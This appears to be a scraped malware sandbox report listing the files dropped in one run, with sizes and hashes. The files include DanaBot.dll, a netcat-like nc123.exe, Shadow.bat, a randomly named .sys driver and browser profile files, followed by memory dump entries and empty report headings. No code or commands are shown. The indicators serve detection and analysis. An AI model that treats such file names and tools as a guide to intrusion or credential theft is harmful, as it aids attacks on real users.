2620b00015da0a4bac80f5cf59f3485d2d5494a0e0a9b18fedcd02e46425427abca6a14a1d6620d8959b98b843ba35175a553d572ff45ff73fdfbf57c68b68bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
1KB

MD5
56e1579bc041b3c93df6524d6865bfc7

SHA1
bf218b3b77986e683249f9c0f4ee4b3bafd04acc

SHA256
d7a2d3122d7e4a64fc82f7cab124200595020fc03d3a8ade06c2a545d5cc8cf7

SHA512
806fc876b99780aa9b6885094cac3edabb0cf40dba974f4615bd9db355acd2baeaad4fc1439126ab46d2b0990923e887f77a739f6a3355ed020cb471bfffa21e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
1KB

MD5
d25543d7081b09cdc2de5d41caf5687e

SHA1
eb7757d65ef92395b7716ca9b4f186b3ef301d86

SHA256
c09b9c91f75d083a994d3a2869fb4582b715cb98167811763b400dfc8aa4c13f

SHA512
9626541cf911bc4245d29f1e9685d006e260ecc495129b669e4711a93856ba380d68ff7e47a15e53632694518d96a290969177d2c6476a925126101e532e6d94

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
1KB

MD5
9ae5038a931df0fa39e036f209ae7da1

SHA1
ed27217d00af33214fb458fd9873362c8be73d0c

SHA256
8728ff5bc68606fcdf5db176f199d2f520c0024d51ae91a8d1175921f8d3644a

SHA512
be2173e072d78965bdb9e8b74d2c8f587b185d39e6dd27774d82e00a2abd02cc66a0ff5467112245409477b53f7e12eacdaa701062eef6c84b3ef80ef525a15b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
1KB

MD5
a8e6fb31a9f52c9dcec37e0ad7ad69bb

SHA1
042644015628570c113a72bdf03b9fc8ec8d3572

SHA256
a2c4e8fd306bb55ddd22f533774617354ba564fbbe7eded7a83f241ef1865cd6

SHA512
33d19574d2153e9473c3fbc1e53b0765422cfcc02d1b54c11760fc5141c1669e1fa20b95c0dbb4ef94592c63142ac70650fcfdd50f96cbc918e126dddad2fa49

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
1KB

MD5
e30ac5209a2777fd4872bbf8632189e4

SHA1
348be45d1ea1070e3a9067a9173cc05752b9b89d

SHA256
6669f06889cfb99283ad05ca7bd1b2ee27707994eea148ee6fa1058d29b2b446

SHA512
4f47b374c8c4c43496132ae6401fc42dfc05fc7d2c70976cafbe08253637fedfab7f22924be598b87dde1c8d78171ed991c680f6014ed213fa79e0529fe7c8f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
1KB

MD5
b55a3397a8d068cdc1dcb22308b89686

SHA1
fc3e818f4fc3d9bb3819358ff2fc1973b94ef633

SHA256
ae563397a5e6d64217c49c022179157f922133d57d8f7678a829bad0aa652727

SHA512
6cc48e03d9a8086ea62614eb5ab7c8eef476a68d02eaabeba95fa2c6d2e85c854032dd90be19db9cd582c3979b8a75d5723daee187d450a243b0a9874ea8b355

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
1KB

MD5
8aa668a2c68c378b571e7bf3318dea54

SHA1
a7902a5246fc50bc8814204fa9c970bb628a014d

SHA256
5029a8ddde0b284b568548aaf5ef3d818eb3acdf40677a07d6cb35c1d2d5b8ba

SHA512
251e5a9a978338d5758897e92d4c032243dd4d8f360eb21b45475df2e74c6605335b396d63eb1444a228de1e24f286dfa0b4aa1d5ac47b8441e7a734710eb39f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
1KB

MD5
0287f18934ee1027b15c82cee8dbb348

SHA1
f1b65a4d909552e17e89f58f350094bd077b7505

SHA256
d0023ae6231e5a6f9248e7b85828e181f735a691b16f1f28a394a7954892e693

SHA512
265e90d634b1f4088d74b8ac937e3d2c6df77f4c6dc175e2ee47cf2de1d366ad049d6de1b91a89437397e797fa7c04c55ba5b4c43d2272fbba3d6de669d16453

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
1KB

MD5
31e2f3f4c20d8143b882c7e89e6e03c1

SHA1
9f2b5a4ec9148f6950c1bf32a6316a7e102e6b14

SHA256
53136cd587452debdc42e47f8014808e15f714abb0299880717315075b3c7288

SHA512
087510f5b97d2c5de3f4667fb52fa4cb2b12d7abfb1442d3a7cb4bb0694edbab777544399fd3ab04d614a13273ae899c5384d5afff76c97fe4eb9bf7bf639d24

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
1KB

MD5
5ee39fa78d048b7e7f05a514edd7909d

SHA1
e23d95c1a917102565413e540422016446827b4b

SHA256
d4ad559b1b6b11aa0b0a64dfe87297a6033aa33a1ce302c80fdb9b3faa1c926c

SHA512
d91a55ac4b24e73062b1833baba0dd158020fcb30ff1fb26865785a98db85f9337a27f0c5b948c0c3a1536091e48566cf40e8abf713c584fbd9100ba19407e9c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
1KB

MD5
21780cd84f531c662f06f96375678c69

SHA1
6ec33cb6ae653bbd96f580175a7d287237f9a669

SHA256
81e2d007088800afe4907e7a9b96a2cd757625467524de94e30b22936dd29b39

SHA512
e6bc53de973e898bdc807257b4a47e79e09897308638a6e678518d468d9e784a1e1970f6279fe453a5119b68f43e5c7d6518fb7703ef9d43c4bee498748fbc74

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57eafc.TMP
Filesize
703B

MD5
4ee047698af34320d7a5e331b3af74aa

SHA1
9100afba8490b8ba86555f5b6efc7eba3fcc61a6

SHA256
049ca211c1f05d4c40602c7993abc2f46e4347ad438beba8505ae95c80b91fa4

SHA512
b0f141b7440087203b13ac4fb7cc4acf25238a2515508e3a229459edf8d0e9ef1dcfbb6a67b1b6baadc095d344969d80ce2f376479c971ba141907c354ee00fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
12KB

MD5
d00ef0acb5f440850819c873bc775fbb

SHA1
53c7dcd81966744cb3335943000957ad80b57dee

SHA256
ee881801070fed293d7c5e0ef75a9fcffe83dbbcf9eb9b73103de6f2a8f48093

SHA512
721e7612c000d9a25bc4a2417b39a1bcee2b5963e750be9a21b3f63525bca0d98a9bd10bdf02f88426864142fa8b13d8800d8ef72958acfbab04f6dc85bfa040

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
12KB

MD5
0fb215b55e1504076019af6240941a7b

SHA1
214a0208953c2607001656a10ab6820f72d788ea

SHA256
c81a954ffe9e78cd9b109254e819484b23feb987b7f9d4715e46b5a8380e9f08

SHA512
c0ef4928fe072cdb73f27e4b245c1e8febb4fa068d50b93a59b235e7cb47425fad43b719346eeeb54355a7f6272f64fc67953ba31554bc6c3fbe6706313586cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
12KB

MD5
da0159fc4c14d6cb78a19c3d74b488c2

SHA1
abb7610e5a465e392f5f46ea64581af98dc54648

SHA256
fc20fb981e7621b1d0998248c442ff9ecacc7c3744b8647ff58dcc6db3ef5098

SHA512
6de798e11ccd0aca0c02467d393419de784902f0672dc2558f0e136d8b71c50b58760cff8c3c61f5dc65019cf00930d319b7fc33575cc77e7a167d86d7808de9

Download Submit
C:\Users\Admin\DOWNLO~1\DanaBot.dll
Filesize
2.4MB

MD5
7e76f7a5c55a5bc5f5e2d7a9e886782b

SHA1
fc500153dba682e53776bef53123086f00c0e041

SHA256
abd75572f897cdda88cec22922d15b509ee8c840fa5894b0aecbef6de23908a3

SHA512
0318e0040f4dbf954f27fb10a69bce2248e785a31d855615a1eaf303a772ad51d47906a113605d7bfd3c2b2265bf83c61538f78b071f85ee3c4948f5cde3fb24

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 388950.crdownload
Filesize
2.7MB

MD5
48d8f7bbb500af66baa765279ce58045

SHA1
2cdb5fdeee4e9c7bd2e5f744150521963487eb71

SHA256
db0d72bc7d10209f7fa354ec100d57abbb9fe2e57ce72789f5f88257c5d3ebd1

SHA512
aef8aa8e0d16aab35b5cc19487e53583691e4471064bc556a2ee13e94a0546b54a33995739f0fa3c4de6ff4c6abf02014aef3efb0d93ca6847bad2220c3302bd

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 464505.crdownload
Filesize
11.5MB

MD5
928e37519022745490d1af1ce6f336f7

SHA1
b7840242393013f2c4c136ac7407e332be075702

SHA256
6fb303dd8ba36381948127d44bd8541e4a1ab8af07b46526ace08458f2498850

SHA512
8040195ab2b2e15c9d5ffa13a47a61c709738d1cf5e2108e848fedf3408e5bad5f2fc5f523f170f6a80cb33a4f5612d3d60dd343d028e55cfc08cd2f6ed2947c

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 478829.crdownload:SmartScreen
Filesize
7B

MD5
4047530ecbc0170039e76fe1657bdb01

SHA1
32db7d5e662ebccdd1d71de285f907e3a1c68ac5

SHA256
82254025d1b98d60044d3aeb7c56eed7c61c07c3e30534d6e05dab9d6c326750

SHA512
8f002af3f4ed2b3dfb4ed8273318d160152da50ee4842c9f5d9915f50a3e643952494699c4258e6af993dc6e1695d0dc3db6d23f4d93c26b0bc6a20f4b4f336e

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 549588.crdownload
Filesize
50KB

MD5
47abd68080eee0ea1b95ae31968a3069

SHA1
ffbdf4b2224b92bd78779a7c5ac366ccb007c14d

SHA256
b5fc4fd50e4ba69f0c8c8e5c402813c107c605cab659960ac31b3c8356c4e0ec

SHA512
c9dfabffe582b29e810db8866f8997af1bd3339fa30e79575377bde970fcad3e3b6e9036b3a88d0c5f4fa3545eea8904d9faabf00142d5775ea5508adcd4dc0a

Download Submit
C:\Users\Admin\Downloads\ac\EVER\Everything.ini
Filesize
19KB

MD5
5531bbb8be242dfc9950f2c2c8aa0058

SHA1
b08aadba390b98055c947dce8821e9e00b7d01ee

SHA256
4f03ab645fe48bf3783eb58568e89b3b3401956dd17cb8049444058dab0634d7

SHA512
3ce7e1d7b330cc9d75c3ce6d4531afe6bfa210a0bcbb45d4a7c29aabff79bebf3263fe0b5377956e2f88036b466383f001a7a6713da04a411b1aceb42bc38291

Download Submit
C:\Users\Admin\Downloads\ac\EVER\SearchHost.exe
Filesize
1.6MB

MD5
8add121fa398ebf83e8b5db8f17b45e0

SHA1
c8107e5c5e20349a39d32f424668139a36e6cfd0

SHA256
35c4a6c1474eb870eec901cef823cc4931919a4e963c432ce9efbb30c2d8a413

SHA512
8f81c4552ff561eea9802e5319adcd6c7e5bdd1dc4c91e56fda6bdc9b7e8167b222500a0aee5cf27b0345d1c19ac9fa95ae4fd58d4c359a5232bcf86f03d2273

Download Submit
C:\Users\Admin\Downloads\ac\Shadow.bat
Filesize
28B

MD5
df8394082a4e5b362bdcb17390f6676d

SHA1
5750248ff490ceec03d17ee9811ac70176f46614

SHA256
da3f155cfb98ce0add29a31162d23da7596da44ba2391389517fe1a2790da878

SHA512
8ce519dc5c2dd0bbb9f7f48bedf01362c56467800ac0029c8011ee5d9d19e3b3f2eff322e7306acf693e2edb9cf75caaf7b85eb8b2b6c3101ff7e1644950303d

Download Submit
C:\Users\Admin\Downloads\ac\mssql.exe
Filesize
10.2MB

MD5
f6a3d38aa0ae08c3294d6ed26266693f

SHA1
9ced15d08ffddb01db3912d8af14fb6cc91773f2

SHA256
c522e0b5332cac67cde8fc84080db3b8f2e0fe85f178d788e38b35bbe4d464ad

SHA512
814b1130a078dcb6ec59dbfe657724e36aa3db64ed9b2f93d8559b6a50e512365c8596240174141d6977b5ddcf7f281add7886c456dc7463c97f432507e73515

Download Submit
C:\Users\Admin\Downloads\ac\mssql2.exe
Filesize
6.7MB

MD5
f7d94750703f0c1ddd1edd36f6d0371d

SHA1
cc9b95e5952e1c870f7be55d3c77020e56c34b57

SHA256
659e441cadd42399fc286b92bbc456ff2e9ecb24984c0586acf83d73c772b45d

SHA512
af0ced00dc6eeaf6fb3336d9b3abcc199fb42561b8ce24ff2e6199966ad539bc2387ba83a4838301594e50e36844796e96c30a9aa9ad5f03cf06860f3f44e0fa

Download Submit
C:\Users\Admin\Downloads\ac\nc123.exe
Filesize
125KB

MD5
597de376b1f80c06d501415dd973dcec

SHA1
629c9649ced38fd815124221b80c9d9c59a85e74

SHA256
f47e3555461472f23ab4766e4d5b6f6fd260e335a6abc31b860e569a720a5446

SHA512
072565912208e97cc691e1a102e32fd6c243b5a3f8047a159e97aabbe302bddc36f3c52cecde3b506151bc89e0f3b5acf6552a82d83dac6e0180c873d36d3f6b

Download Submit
C:\Users\Admin\Downloads\ac\pfzswpzjrkmlvhjhq.sys
Filesize
674KB

MD5
b2233d1efb0b7a897ea477a66cd08227

SHA1
835a198a11c9d106fc6aabe26b9b3e59f6ec68fd

SHA256
5fd17e3b8827b5bb515343bc4066be0814f6466fb4294501becac284a378c0da

SHA512
6ca61854db877d767ce587ac3d7526cda8254d937a159fd985e0475d062d07ae83e7ff4f9f42c7e1e1cad5e1f408f6849866aa4e9e48b29d80510e5c695cee37

Download Submit
C:\Users\Admin\Downloads\ac\systembackup.bat
Filesize
1KB

MD5
b4b2f1a6c7a905781be7d877487fc665

SHA1
7ee27672d89940e96bcb7616560a4bef8d8af76c

SHA256
6246b0045ca11da483e38317421317dc22462a8d81e500dee909a5269c086b5f

SHA512
f883cea56a9ac5dcb838802753770494ce7b1de9d7da6a49b878d534810f9c87170f04e0b8b516ae19b9492f40635a72b3e8a4533d39312383c520abe00c5ae6

Download Submit
\??\pipe\LOCAL\crashpad_1456_DCIFVFOPNMQTJREO
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/944-1107-0x0000000076190000-0x0000000076280000-memory.dmp

Filesize
960KB

Download
memory/944-1103-0x0000000000400000-0x0000000000B02000-memory.dmp

Filesize
7.0MB

Download
memory/944-1125-0x0000000076190000-0x0000000076280000-memory.dmp

Filesize
960KB

Download
memory/944-1124-0x0000000000400000-0x0000000000B02000-memory.dmp

Filesize
7.0MB

Download
memory/944-1123-0x0000000076190000-0x0000000076280000-memory.dmp

Filesize
960KB

Download
memory/944-1113-0x0000000000400000-0x0000000000B02000-memory.dmp

Filesize
7.0MB

Download
memory/2416-589-0x0000000000400000-0x0000000000AAD000-memory.dmp

Filesize
6.7MB

Download
memory/2416-603-0x0000000000400000-0x0000000000AAD000-memory.dmp

Filesize
6.7MB

Download
memory/2652-604-0x0000000000400000-0x000000000066B000-memory.dmp

Filesize
2.4MB

Download
memory/2652-777-0x0000000000400000-0x000000000066B000-memory.dmp

Filesize
2.4MB

Download
memory/2652-1159-0x0000000000400000-0x000000000066B000-memory.dmp

Filesize
2.4MB

Download
memory/2652-757-0x0000000000400000-0x000000000066B000-memory.dmp

Filesize
2.4MB

Download
memory/2652-592-0x0000000000400000-0x000000000066B000-memory.dmp

Filesize
2.4MB

Download
memory/2824-1126-0x0000000140000000-0x0000000140ACB000-memory.dmp

Filesize
10.8MB

Download
memory/2824-1112-0x0000000140000000-0x0000000140ACB000-memory.dmp

Filesize
10.8MB

Download
memory/3672-583-0x0000000002B50000-0x0000000002DDD000-memory.dmp

Filesize
2.6MB

Download
memory/3672-590-0x0000000000400000-0x0000000000AAD000-memory.dmp

Filesize
6.7MB

Download
memory/3672-591-0x0000000002B50000-0x0000000002DDD000-memory.dmp

Filesize
2.6MB

Download
memory/3672-584-0x0000000000400000-0x0000000000AAD000-memory.dmp

Filesize
6.7MB

Download
memory/3672-582-0x00000000028D0000-0x0000000002B4C000-memory.dmp

Filesize
2.5MB

Download
memory/3976-611-0x0000000000400000-0x0000000000AAD000-memory.dmp

Filesize
6.7MB

Download
memory/3976-610-0x0000000000400000-0x0000000000AAD000-memory.dmp

Filesize
6.7MB

Download
memory/3976-609-0x0000000002730000-0x00000000029B6000-memory.dmp

Filesize
2.5MB

Download
memory/4036-776-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/4856-938-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/4856-709-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/4888-771-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download

Resubmissions

Analysis

Sharing

Errors

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads